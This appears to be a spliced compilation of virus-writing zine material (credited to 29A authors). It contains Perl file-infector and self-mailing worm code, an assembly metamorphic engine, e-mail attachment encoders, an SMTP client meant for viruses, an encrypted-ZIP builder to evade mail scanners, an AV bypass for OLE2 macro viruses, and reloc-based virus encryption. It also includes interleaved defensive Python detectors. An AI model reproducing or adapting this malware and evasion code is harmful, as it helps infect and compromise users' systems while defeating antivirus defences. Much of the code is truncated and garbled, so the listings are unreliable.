if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) {
if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) {
open(File, ">$FileName");
print File @Virus;
print File @Temp;
close (File);
}}}}}
sub SearchUpperDirectorys {
foreach $Directory (<*>) {
if ((-r $Directory) && (-w &Directory ) && (-d $Directory) {
chdir ($Directory);
&InfectFile;
chdir ('..')
}}}
Ok, if we are in MacOS, we just infect the lower directory. If we are in a DOS or Windows environment, we infect the folder below and start to search for others at C:\. Afterwards we restore the old directory. On every other OS, we search from the root directory for others. Afterwards we restore the original one. Wow, first of all I wanted to start parsing the Path variable which contains all directories which will be searched when you want to start an executable, but with all these incompatibility problems... maybe later. Now I want to have a look at the virus I talked about before, which I found on the web. AVP detects this thing as Perl.spoon and it is created by PaddingX. I just hope it is ok for him if I present his source here, but I don't know where to reach him to ask him. So if you read this and want me to remove this part, just tell me! I added some comments so you will understand the code. These comments are marked with an 'S'.
#!/usr/bin/perl
use File::Find; #S he uses a module to find files, it's included all standart
perl installations
&virus(); #S calling of the sub Virus
#S after Virus Sub is executed we see a little payload ( just
in dropper ! )
print "\nThis program is infected by the Perl virus\n\n";
Ok, as we see, this virus is an appender. It writes a call to the virus at the start and appends the rest to the file. This is like the old COM infection appending in DOS. ;)
The infected file will look like this:
[ Stub :
#!/usr/bin/perl
use File::Find;
&virus(); ]
[... Original File ... ]
[ .. virus procedure ..]
Even if it will just run on Unixes (because of the path and because fork is not implemented on Mac OS, Win32, AmigaOS and RISC OS) it is still a nice piece of code, because I think it would be possible to use EPO techniques with this kind of infection, by searching for a call (&Procedure) and changing it to the virus and placing a call to the original procedure at the end of the virus...
Ok, here comes a last piece of code, just to show another simple thing you can do with Perl, because everyone says that selfmailing worms are something which can just be done with Windows script languages. This is a selfmailing Perl worm, which uses sendmail and assumes that the mails are in the /var/spool/mail/ directory. Maybe one of those who know more about Linux than I do might want to modify it to retrieve the mail folder from sendmail.cf ;)
#!/usr/bin/perl
open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...29];
close(File);
chomp(@Addy[1]);
chop(@Addy[1]);
$x = `sendmail @Addy[1] < PerlWurm`;
}}}
Hope you enjoyed this little trip into the world of perl. I did. ;)
comment %
into different instructions and then call it, provided that eax must
not be preserved. Run it under a debugger and see how it works by
single stepping through the Call instr1 instructions.
If you understand the process, with very few modifications you can
use this to also metamorphize instructions like:
.586p
.model flat, stdcall
jumps
.data
db 0
.code
;
start: ;
xor ebp, ebp ; assume virus model ;-)
;
mov eax, 11111111h ;
call instr1 ;do original instruction
;
mov eax, 0 ;metamorphize instr 0
call LJ_Metamorphize ;
mov eax, 22222222h ;
call instr1 ;run it!
;
mov eax, 0 ;metamorphize again
call LJ_Metamorphize ;
mov eax, 33333333h ;
call instr1 ;run it!
;
mov eax, 0 ;metamorphize again
call LJ_Metamorphize ;
mov eax, 44444444h ;
call instr1 ;run it!
;
push 0 ;
call ExitProcess ;
db 10 dup (0)
; Here are the instruction sets that can be executed in order to do the
; action. These also should be spread into the code
var1_instr_1: ;variant 1
mov [ebp+var1_1], eax ;
nop ;
ret ;
;
var1_instr_2: ;variant 2
push eax ;
pop [ebp+var1_1] ;
nop ;
ret ;
;
var1_instr_3: ;variant 3
xchg [ebp+var1_1], eax ;
nop ;
ret ;
; These are the possible ways to keep the value. They should be spread inside
; the code as separated as possible
var1_1 dd 0 ; address 1
var1_2 dd 0 ; address 2
var1_3 dd 0 ; address 3
; - Metamorphizer
LJ_Metamorphize:
; Entry: EAX = hunk number (starting with 0!) ;
;
pusha ;
;
call ChooseAddress ;choose address to use
call ChooseInstruction ;choose instruction to use
call FillPlace ;fill the address
call FillJump ;fill the jump to it
;
popa ;
ret ;
;
choosen_address dd 0 ;holds the address
choosen_instruction dd 0 ;holds the instruction
choosen_bit dd 0 ;the bit to address
;
ChooseAddress: ;
push eax ;
lea esi, [ebp+AddressTable] ;point address tables
mov ecx, eax ;
or ecx, ecx ;
jz found_addresses ;
;
find_addresses: ;
lodsd ;
add esi, eax ;
loop find_addresses ;
;
found_addresses: ;
lodsd ;how many?
call brandom32 ;get a random one
mov eax, [esi+eax*4] ;
mov [ebp+choosen_address], eax ;save address
pop eax ;
ret ;
;
ChooseInstruction: ;
push eax ;
lea esi, [ebp+InstructionTable] ;point instructions
mov ecx, eax ;
or ecx, ecx ;
jz found_instructions ;
;
find_instructions: ;
lodsd ;
add esi, eax ;
loop find_instructions ;
;
found_instructions: ;
lodsd ;how many?
call brandom32 ;get a random one
mov ebx, [esi+eax*2*4] ;
mov [ebp+choosen_instruction], ebx ;save it, and
mov ebx, [esi+eax*2*4+4] ;
mov [ebp+choosen_bit], ebx ;the bit
pop eax ;
ret ;
;
FillPlace: ;
push eax ;
mov eax, [ebp+choosen_address] ;take the address
mov ebx, [ebp+choosen_instruction] ;go to the instruction
add ebx, ebp ;
add ebx, [ebp+choosen_bit] ;to the right bit
mov [ebx], eax ;and fill the address
pop eax ;
ret ;
;
FillJump: ;
push eax ;
lea esi, [ebp+Jumps] ;locate the jump
add esi, eax ;
;
lodsd ;
mov ebx, [ebp+choosen_instruction] ;get the offset of the
sub ebx, eax ;instruction
add eax, ebp ;
sub ebx, 2 ;calculate jump length
mov [eax+1], ebx ;create jump!
;
pop eax ;
ret ;
;
;
AddressTable: ;
Ahunk1: ;
dd 3 ;length of hunk
dd offset var1_1 ;addresses
dd offset var1_2 ;
dd offset var1_3 ;
;
InstructionTable: ;
Ihunk1: ;
dd 3 ;length of hunk
dd offset var1_instr_1 ;first instruction
dd 2 ;at what bit offset?
dd offset var1_instr_2 ;
dd 3 ;
dd offset var1_instr_3 ;
dd 2 ;
;
Jumps: ;
Jhunk1: ;
dd offset instr1 ;jump address
;
;---------------------- ;
brandom32 proc ;this bounds eax
push edx ;between 0 and eax-1
push ecx ;on random basis
mov edx, 0 ;
push eax ;
call random32 ;
pop ecx ;
div ecx ;
xchg eax, edx ;
pop ecx ;
pop edx ;
ret ;
brandom32 endp ;
;
random32 proc ;this is a random nr
push edx ;generator. It's a
call GetTickCount ;modified version of
rcl eax, 2 ;some random gen I found
add eax, 12345678h ;someday and it had
random_seed = dword ptr $-4 ;some flaws I fixed...
adc eax, esp ;
xor eax, ecx ;
xor [ebp+random_seed], eax ;
add eax, [esp-8] ;
rcl eax, 1 ;
pop edx ;
ret ;
random32 endp ;
;
end start ;
end ;
; Win32 386+ Random-Number-In-Range Generator.
;
; Most Win32 random number generators I've come across so far were
; actually rather predictable, so here goes my attempt to code a
; truly random one. It's small, simple and reasonably fast.
;
.386
.MODEL FLAT
EXTRN GetTickCount:PROC
EXTRN ExitProcess:PROC
.DATA
Random_Seed DD 0
.CODE
START:
CALL GetTickCount ; Initialize random seed.
MOV Random_Seed, EAX ; This can be anything.
PUSH 0
CALL ExitProcess
PUSH 32
POP ECX
POP EDX
POP ECX
RETN
END START
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MIME.ASM]ÄÄÄ
; MIME attachment encoder.
.386
.MODEL FLAT
.DATA
EXTRN ExitProcess:PROC
EXTRN CreateFileA:PROC
EXTRN CloseHandle:PROC
EXTRN ReadFile:PROC
EXTRN WriteFile:PROC
EXTRN GetFileSize:PROC
START:
XOR EBX, EBX
PUSH EBX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EBX
PUSH EBX
PUSH GENERIC_READ
CALL @1
DB 'INPUT.BIN', 0 ; Binary you want to encode.
@1: CALL CreateFileA
PUSH EBX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH CREATE_ALWAYS
PUSH EBX
PUSH EBX
PUSH GENERIC_WRITE
CALL @2
DB 'OUTPUT.EML', 0
@2: CALL CreateFileA
PUSH EBX
PUSH OFFSET IO_Bytes_Count
PUSH (@4-@3)
CALL @4
@3: DB 'MIME-Version: 1.0', 0Dh, 0Ah
DB 'Content-Type: multipart/mixed; boundary=ir', 0Dh, 0Ah
DB 0Dh, 0Ah
DB '--ir', 0Dh, 0Ah
DB 0Dh, 0Ah
DB 'this is plain text', 0Dh, 0Ah
DB '--ir', 0Dh, 0Ah
DB 'Content-Type: application; name=binary.exe', 0Dh, 0Ah
DB 'Content-Transfer-Encoding: base64', 0Dh, 0Ah
DB 0Dh, 0Ah
@4: PUSH [Output_Handle]
CALL WriteFile
PUSH EBX
PUSH [Input_Handle]
CALL GetFileSize
CDQ
MOV ECX, (76/4)*3
DIV ECX
DEC EDX
JS No_Round
INC EAX
PUSH 0
PUSH OFFSET IO_Bytes_Count
PUSH (76/4)*3
PUSH ESI
PUSH [Input_Handle]
CALL ReadFile
PUSH EDI
PUSH 76/4
POP ECX
MOV CL, 8
LODSB
SHL EAX, CL
LODSB
SHL EAX, CL
LODSB
SHL EAX, CL
MOV CL, 4
ROL EAX, 8
XLAT
STOSB
LOOP Encode_Byte
POP ECX
LOOP Encode_Packet
POP EAX
PUSH 0
PUSH OFFSET IO_Bytes_Count
PUSH 78
PUSH EAX
PUSH [Output_Handle]
CALL WriteFile
POP ECX
LOOP Encode_Line
PUSH 0
CALL @5
IO_Bytes_Count DD 0
@5: PUSH (@7-@6)
CALL @7
@6: DB '--ir--', 0Dh, 0Ah
@7: PUSH [Output_Handle]
CALL WriteFile
PUSH 12345678h
Output_Handle = DWORD PTR $-4
CALL CloseHandle
PUSH 12345678h
Input_Handle = DWORD PTR $-4
CALL CloseHandle
Exit: PUSH 0
CALL ExitProcess
Encoding_Table: DB 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
DB 'abcdefghijklmnopqrstuvwxyz'
DB '0123456789+/'
END START
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MIME.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UUENCODE.ASM]ÄÄÄ
; UUENCODE attachment encoder.
.386
.MODEL FLAT
.DATA
EXTRN ExitProcess:PROC
EXTRN CreateFileA:PROC
EXTRN CloseHandle:PROC
EXTRN ReadFile:PROC
EXTRN WriteFile:PROC
EXTRN GetFileSize:PROC
START:
XOR EBX, EBX
PUSH EBX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EBX
PUSH EBX
PUSH GENERIC_READ
CALL @1
DB 'INPUT.BIN', 0
@1: CALL CreateFileA
PUSH EBX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH CREATE_ALWAYS
PUSH EBX
PUSH EBX
PUSH GENERIC_WRITE
CALL @2
DB 'OUTPUT.UUE', 0
@2: CALL CreateFileA
PUSH EBX
PUSH OFFSET IO_Bytes_Count
PUSH 22
CALL @3
DB 'begin 644 binary.exe', 0Dh, 0Ah
@3: PUSH [Output_Handle]
CALL WriteFile
PUSH EBX
PUSH [Input_Handle]
CALL GetFileSize
DEC EDX
JS No_Round
INC EAX
PUSH 0
PUSH OFFSET IO_Bytes_Count
PUSH 45
PUSH ESI
PUSH [Input_Handle]
CALL ReadFile
CLD
Encode_DWORD: LODSD
DEC ESI
SHL EAX, 8
MOV BH, AH
ROL EAX, 8
XCHG AL, BH
ROR EAX, 8
MOV AH, BH
PUSH ECX
PUSH 4
POP ECX
SHL EAX, 8
LOOP Encode_Byte
POP ECX
LOOP Encode_DWORD
PUSH 0
PUSH OFFSET IO_Bytes_Count
PUSH 63
PUSH OFFSET Output_Buffer
PUSH [Output_Handle]
CALL WriteFile
POP ECX
LOOP Encode_Line
PUSH ECX
CALL @4
IO_Bytes_Count DD 0
@4: PUSH 8
CALL @5
DB '`', 0Dh, 0Ah, 'end', 0Dh, 0Ah
@5: PUSH [Output_Handle]
CALL WriteFile
PUSH 12345678h
Output_Handle = DWORD PTR $-4
CALL CloseHandle
PUSH 12345678h
Input_Handle = DWORD PTR $-4
CALL CloseHandle
Exit: PUSH 0
CALL ExitProcess
Input_Buffer DB 45 DUP(0)
Output_Buffer DB 63 DUP(0)
END START
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UUENCODE.ASM]ÄÄÄ
; SMTP client.
; Sends an e-mail using the Outlook SMTP server specified in the registry.
;
.386
.MODEL FLAT
.DATA
EXTRN ExitProcess:PROC
EXTRN WSAStartup:PROC
EXTRN WSACleanup:PROC
EXTRN gethostbyname:PROC
EXTRN socket:PROC
EXTRN closesocket:PROC
EXTRN connect:PROC
EXTRN select:PROC
EXTRN recv:PROC
EXTRN send:PROC
EXTRN RegCloseKey:PROC
EXTRN RegQueryValueExA:PROC
EXTRN RegOpenKeyExA:PROC
START:
CALL Get_EIP ; Get delta offset, in case
Get_EIP: POP EBP ; someone would want to stuff
SUB EBP, (Get_EIP-START) ; this in a virus.
CALL @2
DD 9
@2: LEA EAX, [EBP+(Account_Index-START)]
PUSH EAX
PUSH EBX
PUSH EBX
CALL @3
DB 'Default Mail Account', 0
@3: PUSH DWORD PTR [EBP+(Reg_Handle-START)]
CALL RegQueryValueExA
CALL @5
DD 30
@5: LEA EAX, [EBP+(SMTP_Name-START)]
PUSH EAX
PUSH EBX
PUSH EBX
CALL @6
DB 'SMTP Server', 0
@6: PUSH DWORD PTR [EBP+(Reg_Handle-START)]
CALL RegQueryValueExA
MOV BL, 6
CALL @8 ; Time-out:
Time_Out: DD 5 ; - Seconds.
DD 0 ; - Milliseconds.
@8: PUSH EAX ; Error (not used).
PUSH EAX ; Writeability (not used).
CALL @9 ; Readability:
Socket_Set: DD 1 ; - Socket count.
Work_Socket DD 0 ; - Socket.
@9: PUSH EAX ; Unused.
CALL select
MOV BL, 1
MOVZX ECX, AX
SHR EAX, 16
ADD EAX, EBP ; Add delta offset.
PUSH ECX
PUSH 0
PUSH ECX ; Size of buffer.
PUSH EAX ; Buffer.
PUSH DWORD PTR [EBP+(Work_Socket-START)]
CALL send
POP ECX
; This is the addy the mail gets returned to when it can't be delivered.
; If you don't want to get notified of failures, use a blank addy ('<>').
; Main body.
Reg_Handle DD 0
SMTP_Name DB 30 DUP(0)
WSA_Data DB 400 DUP(0)
Buffer DB 512 DUP(0)
END START
; Constructs an encrypted .ZIP-file from an input file.
; Written to be incorporated into e-mail virii, to evade
; e-mail gateway scanners (as they can't decrypt the file).
; The decryption password can be supplied in the body of
; the e-mail, or in the filename (ie. password.is.virus.zip), etc.
;
.386
.MODEL FLAT
.DATA
EXTRN CreateFileA:PROC
EXTRN CloseHandle:PROC
EXTRN GetFileSize:PROC
EXTRN VirtualAlloc:PROC
EXTRN ReadFile:PROC
EXTRN WriteFile:PROC
EXTRN ExitProcess:PROC
EXTRN GetTickCount:PROC
Input_File DB 'INPUT.666', 0
Output_File DB 'ENCODED.ZIP', 0
CRC_Init DD 0FFFFFFFFh
File_Handle DD 0
Archive_Size DD 0
Byte_To_CRC DB 0
Temp DD 0
.CODE
START:
XOR EBP, EBP ; EBP is always 0.
PUSH File_Handle
CALL CloseHandle
PUSH (End_End_CH_Dir-Central_Header)
POP ECX
PUSH OFFSET Central_Header
POP EDX
CALL Write_File
PUSH File_Handle
CALL CloseHandle
Write_File:
PUSH EBP
PUSH OFFSET Temp
PUSH ECX
PUSH EDX
PUSH File_Handle
CALL WriteFile
RETN
Generate_Zip:
PUSHAD
PUSH (End_Cipher_Key-Cipher_Key)
POP ECX
Init_Keys: LODSB
CALL Update_Keys ; Update keys with AL.
LOOP Init_Keys
PUSH EDI
DEC EDI
XOR AL, 1
MUL BX
MOV AL, AH
CALL Update_Keys
INC EDI
LOOP Encrypt_Stream
POPAD
RETN
NOT EAX
MOVZX EAX, AL
INC EAX
NOT EAX
POPAD
RETN
Update_CRC:
PUSH 1
POP ECX
CLD
Load_Character: LODSB
XOR DL, AL
MOV AL, 8
Loop_CRC_Byte: DEC AL
JNZ CRC_Byte
LOOP Load_Character
NOT EAX
POP ESI
POP EDX
RETN
END START
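Added example, not part of the listing above: the check a mail gateway should run on an archive like the one this code produces. It walks the ZIP central directory and treats any entry with the PKWARE "encrypted" bit set as unscannable rather than clean, since the gateway cannot see inside it. The record layouts are the standard PKWARE ones; build_zip makes a constructed test archive and marks entries encrypted by flag only, without real encryption.

```python
import struct
import zlib

LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = 0x04034B50, 0x02014B50, 0x06054B50
FLAG_ENCRYPTED = 0x0001  # general purpose bit 0: traditional PKWARE encryption


def scan_zip(data: bytes) -> list:
    """Walk the central directory and report, per entry, whether the
    encryption bit is set.  Raises ValueError on a damaged archive
    (no EOCD record, bad central directory signature)."""
    eocd = data.rfind(struct.pack("<I", EOCD_SIG))
    if eocd < 0 or eocd + 22 > len(data):
        raise ValueError("no end-of-central-directory record")
    # EOCD: sig, disk, cd disk, entries on disk, entries total, cd size, cd offset
    count, cd_size, cd_off = struct.unpack_from("<HII", data, eocd + 10)
    entries, pos = [], cd_off
    for _ in range(count):
        if struct.unpack_from("<I", data, pos)[0] != CENTRAL_SIG:
            raise ValueError("bad central directory entry at 0x%X" % pos)
        flags, method = struct.unpack_from("<HH", data, pos + 8)
        csize, usize, nlen, xlen, clen = struct.unpack_from("<IIHHH", data, pos + 20)
        name = data[pos + 46:pos + 46 + nlen].decode("cp437")
        entries.append({"name": name, "encrypted": bool(flags & FLAG_ENCRYPTED),
                        "method": method, "compressed_size": csize, "size": usize})
        pos += 46 + nlen + xlen + clen
    return entries


def gateway_verdict(entries: list) -> str:
    """Policy: content the gateway cannot decrypt is not 'clean', it is
    unscanned, so it must be held rather than passed through."""
    if any(e["encrypted"] for e in entries):
        return "quarantine-unscannable"
    return "scan-contents"


def build_zip(files) -> bytes:
    """Constructed test archive (not from the article): stored entries only.
    encrypted=True sets flag bit 0 and reserves the 12-byte encryption
    header slot; the payload itself is left in clear, which is all the
    detector above needs to see."""
    local, central = b"", b""
    for name, payload, encrypted in files:
        flags = FLAG_ENCRYPTED if encrypted else 0
        body = (b"\0" * 12 + payload) if encrypted else payload
        crc = zlib.crc32(payload) & 0xFFFFFFFF
        nm = name.encode("cp437")
        # version needed, flags, method, time, date, crc, csize, usize, nlen, xlen
        fixed = struct.pack("<HHHHHIIIHH", 20, flags, 0, 0, 0, crc,
                            len(body), len(payload), len(nm), 0)
        offset = len(local)
        local += struct.pack("<I", LOCAL_SIG) + fixed + nm + body
        # central header = sig, version made by, same fixed part, then
        # comment len, disk, internal attrs, external attrs, local header offset
        central += (struct.pack("<IH", CENTRAL_SIG, 20) + fixed
                    + struct.pack("<HHHII", 0, 0, 0, 0, offset) + nm)
    n = len(files)
    eocd = struct.pack("<IHHHHIIH", EOCD_SIG, 0, 0, n, n, len(central), len(local), 0)
    return local + central + eocd
```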
How to get AVP not detecting viruses in OLE2 files:
--------------------------------------------------
I discovered this problem in AVP some time ago while I was disassembling
part of its code.
Procedure:
1.- Take a macro virus and check that AVP detects it.
2.- Open the file with a hex editor and go to offset 0x48.
3.- Look at the double word there; it should be 0 if the file is not too big.
4.- Change it to some very high value (example: 0x99999999).
5.- Check the file with AVP again and you will see that it doesn't detect
anything any more.
6.- You can check that the virus is still active and that Word loads the file
without any kind of problem. :-)
You can also check that all the other AVs still detect it without problems.
Explanation:
OLE2 files are like a simple file system, organized into something similar
to a FAT. For big files it uses a double FAT; its size is at offset 0x48 (if
it's 0, it means it is not being used) and at offset 0x44 is its initial
"sector".
Before analyzing a file, AVP tries to check whether it is corrupted. In this
case we are making it believe that the file is bigger than its real size on
disk, so AVP believes it is truncated. That's why AVP doesn't analyze it.
Why don't Word and all the other antiviruses have the same problem? Because
they don't try to access that field, and since the file is small they never
really need to access such high positions in the file.
Tcp/29A
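Added example (mine, not Tcp's): the header sanity check a scanner should do instead of skipping the file. It cross-checks the two fields the article names, the DIFAT start at 0x44 and the DIFAT sector count at 0x48, against the FAT sector count and the real file size, and reports "inconsistent" so the file is still scanned rather than written off as truncated. The other offsets (sector shift at 0x1E, FAT sector count at 0x2C, the 109 DIFAT entries at 0x4C) are the standard OLE2 header layout; build_sample creates a constructed header, not a real document.

```python
import struct

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ENDOFCHAIN = 0xFFFFFFFE
HEADER_SIZE = 512
HEADER_DIFAT_ENTRIES = 109  # FAT sector numbers stored inside the header itself


def difat_check(data: bytes) -> dict:
    """Cross-check the DIFAT fields at 0x44/0x48 against the FAT count and
    the real file size.  Returns the parsed values plus a verdict:
      'not-ole2'     - no OLE2 signature or shorter than one header
      'ok'           - DIFAT fields agree with the rest of the file
      'inconsistent' - header claims DIFAT sectors the file cannot hold or
                       does not need; treat as 'untrusted header, scan on',
                       never as 'truncated, skip'."""
    if len(data) < HEADER_SIZE or data[:8] != OLE2_MAGIC:
        return {"verdict": "not-ole2"}
    sector_size = 1 << struct.unpack_from("<H", data, 0x1E)[0]
    num_fat = struct.unpack_from("<I", data, 0x2C)[0]
    first_difat, num_difat = struct.unpack_from("<II", data, 0x44)
    # Sector 0 begins right after the 512-byte header.
    sectors_on_disk = (len(data) - HEADER_SIZE) // sector_size
    info = {"sector_size": sector_size, "num_fat": num_fat,
            "first_difat": first_difat, "num_difat": num_difat,
            "sectors_on_disk": sectors_on_disk}

    # The first 109 FAT sectors are listed in the header; every further DIFAT
    # sector lists (sector_size/4 - 1) more FAT sectors plus a chain link.
    per_difat = sector_size // 4 - 1
    extra_fat = max(0, num_fat - HEADER_DIFAT_ENTRIES)
    needed_difat = -(-extra_fat // per_difat)  # ceiling division

    problems = []
    if num_difat != needed_difat:
        problems.append("num_difat %d but FAT count %d needs %d"
                        % (num_difat, num_fat, needed_difat))
    if num_difat > sectors_on_disk:
        problems.append("num_difat %d exceeds %d sectors on disk"
                        % (num_difat, sectors_on_disk))
    if num_difat and first_difat >= sectors_on_disk:
        problems.append("first_difat 0x%X points past end of file" % first_difat)
    if num_difat == 0 and first_difat != ENDOFCHAIN:
        problems.append("no DIFAT sectors but chain start is 0x%X" % first_difat)
    info["problems"] = problems
    info["verdict"] = "inconsistent" if problems else "ok"
    return info


def build_sample(num_difat: int = 0, data_sectors: int = 4) -> bytes:
    """Constructed minimal OLE2 header (not a real document): 512-byte
    sectors, one FAT sector in sector 0, no DIFAT chain, followed by
    data_sectors blank sectors.  num_difat is written straight into 0x48,
    which reproduces step 4 of the procedure above for testing."""
    hdr = bytearray(HEADER_SIZE)
    hdr[0:8] = OLE2_MAGIC
    # minor version, major version, byte order mark, sector shift (9 -> 512)
    struct.pack_into("<HHHH", hdr, 0x18, 0x3E, 0x0003, 0xFFFE, 9)
    struct.pack_into("<H", hdr, 0x20, 6)                 # mini sector shift
    struct.pack_into("<I", hdr, 0x2C, 1)                 # one FAT sector
    struct.pack_into("<I", hdr, 0x30, 1)                 # first directory sector
    struct.pack_into("<I", hdr, 0x38, 0x1000)            # mini stream cutoff
    struct.pack_into("<II", hdr, 0x3C, ENDOFCHAIN, 0)    # no mini FAT
    struct.pack_into("<II", hdr, 0x44, ENDOFCHAIN, num_difat)
    struct.pack_into("<109I", hdr, 0x4C, 0, *([0xFFFFFFFF] * 108))
    return bytes(hdr) + bytes(512 * data_sectors)
```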
Encryption through relocs
Until now the relocation section (.reloc) has been very useful to virus
coders, curiously because it is useless. Why? Virus coders overwrite it to
hide the increase in size after infection. Nothing to worry about: when
Windows loads an executable it gives it a new virtual address space, so it
is loaded at the base address indicated in its header and it's not necessary
to apply the relocs. That's the reason why some compilers don't include a
.reloc section by default unless you tell them to. Of course, the same does
not happen with DLLs, since it's much more common that their base is already
busy (at the very least the executable is already loaded there, and usually
there will be other DLLs), so they must be loaded at another base address
and new relocs applied based on that new base.
Let's see what happens when a module is loaded at a base different from the
one indicated in the header and relocs need to be applied: each entry in the
relocation table points to an address in the module that needs to be fixed
up. From the content of each of these addresses the base indicated in the
header is subtracted (since the content is already relative to that base)
and the base where the module has really been loaded is added.
Another fact we will use is that if we give an executable a base where we
know it cannot be loaded, Windows by default tries to load it at 0x400000.
Taking all this into account, we are going to get a virus encrypted, and
Windows itself will decrypt it; I mean, no decryption routine will be needed.
First, we need a host whose base is 0x400000, and we need to null its relocs
(if it has any). Now we change the executable's base to one we know Windows
will not accept, for example 0x12345678. With this we get Windows to load
the executable at 0x400000 and to apply the relocs; it is because we have
nulled the host's relocs that the host is unaffected, since in the end it is
being loaded at its chosen base anyway.
Now we create a new .reloc section pointing to each DWORD of the body of the
virus and we encrypt every DWORD of the virus in the following way:
We do that because when Windows loads the executable at 0x400000, what it
will do is subtract the header base (0x12345678) and add the real base
(0x400000).
We've gotten Windows to decrypt our virus for us, so in memory it is
different from how it was on disk without a single instruction having been
executed (which only becomes obvious once it has been loaded into a
debugger, for example :-)
In NT there are limitations to the use of this method, since it doesn't want
to load the executable if it finds a strange base (I believe it must be a
multiple of 64KB).
Tcp/29A
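Added example, not from the article: emulating the loader's fix-up pass over an IMAGE_BASE_RELOCATION table so that static analysis sees the same bytes that will execute, plus the two red flags this trick depends on (an ImageBase that is not 64 KiB aligned, and relocations blanketing every dword of a region, which honest code never needs). The reloc block format is the standard PE one; build_fixture reproduces the on-disk state the text describes with the bases 0x12345678 and 0x400000 taken from it, and the body RVA 0x1000 is my constructed choice.

```python
import struct

IMAGE_REL_BASED_ABSOLUTE = 0   # padding entry, ignored by the loader
IMAGE_REL_BASED_HIGHLOW = 3    # 32-bit absolute address fix-up


def parse_reloc_blocks(reloc: bytes):
    """Walk IMAGE_BASE_RELOCATION blocks: (page_rva u32, block_size u32)
    followed by WORD entries, type in the high nibble and a 12-bit offset
    into the page.  Yields (rva, type) for every entry."""
    pos = 0
    while pos + 8 <= len(reloc):
        page_rva, block_size = struct.unpack_from("<II", reloc, pos)
        if block_size < 8 or pos + block_size > len(reloc):
            raise ValueError("malformed relocation block at 0x%X" % pos)
        for off in range(pos + 8, pos + block_size, 2):
            entry = struct.unpack_from("<H", reloc, off)[0]
            yield page_rva + (entry & 0x0FFF), entry >> 12
        pos += block_size


def apply_relocations(image: bytearray, reloc: bytes,
                      preferred_base: int, actual_base: int) -> list:
    """Do what the loader does when the preferred base is unusable: add
    (actual_base - preferred_base) to every HIGHLOW dword.  image is an
    RVA-indexed flat buffer; returns the RVAs that were patched."""
    delta = (actual_base - preferred_base) & 0xFFFFFFFF
    patched = []
    for rva, rtype in parse_reloc_blocks(reloc):
        if rtype == IMAGE_REL_BASED_ABSOLUTE:
            continue
        if rtype != IMAGE_REL_BASED_HIGHLOW:
            raise ValueError("unsupported relocation type %d" % rtype)
        old = struct.unpack_from("<I", image, rva)[0]
        struct.pack_into("<I", image, rva, (old + delta) & 0xFFFFFFFF)
        patched.append(rva)
    return patched


def reloc_anomalies(preferred_base: int, reloc: bytes, image_size: int) -> list:
    """Static red flags separating a reloc-decrypted body from an honest
    relocation table."""
    flags = []
    if preferred_base % 0x10000:
        flags.append("ImageBase 0x%08X is not 64 KiB aligned" % preferred_base)
    rvas = sorted(r for r, t in parse_reloc_blocks(reloc) if t == IMAGE_REL_BASED_HIGHLOW)
    if rvas:
        # Real code holds a pointer every few instructions at most; fix-ups
        # on every 4th byte mean the whole region is being rewritten.
        dense = sum(1 for a, b in zip(rvas, rvas[1:]) if b - a == 4)
        if dense >= 8 and dense >= 0.9 * (len(rvas) - 1):
            flags.append("%d relocations cover every dword of 0x%X-0x%X"
                         % (len(rvas), rvas[0], rvas[-1] + 4))
        if rvas[-1] + 4 > image_size:
            flags.append("relocation past end of image")
    return flags


def build_fixture(plain: bytes, preferred_base: int, actual_base: int,
                  body_rva: int = 0x1000):
    """Constructed test fixture: the on-disk state the article describes.
    Each dword of plain is stored minus the loader delta, and one reloc
    block lists every dword, so the fix-up pass restores plain."""
    assert len(plain) % 4 == 0 and len(plain) <= 0x1000
    delta = (actual_base - preferred_base) & 0xFFFFFFFF
    image = bytearray(body_rva + len(plain))
    for i in range(0, len(plain), 4):
        word = struct.unpack_from("<I", plain, i)[0]
        struct.pack_into("<I", image, body_rva + i, (word - delta) & 0xFFFFFFFF)
    entries = [(IMAGE_REL_BASED_HIGHLOW << 12) | ((body_rva + i) & 0xFFF)
               for i in range(0, len(plain), 4)]
    if len(entries) % 2:
        entries.append(0)  # ABSOLUTE padding keeps the block dword-aligned
    reloc = struct.pack("<II", body_rva & ~0xFFF, 8 + 2 * len(entries))
    reloc += struct.pack("<%dH" % len(entries), *entries)
    return image, reloc
```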
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
; ³ Win9x Ring0 Quest ³ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
; ³ ³ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
; ³ part I ³ ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
; ³ ³ ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
; ³ by Super/29A ³ ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
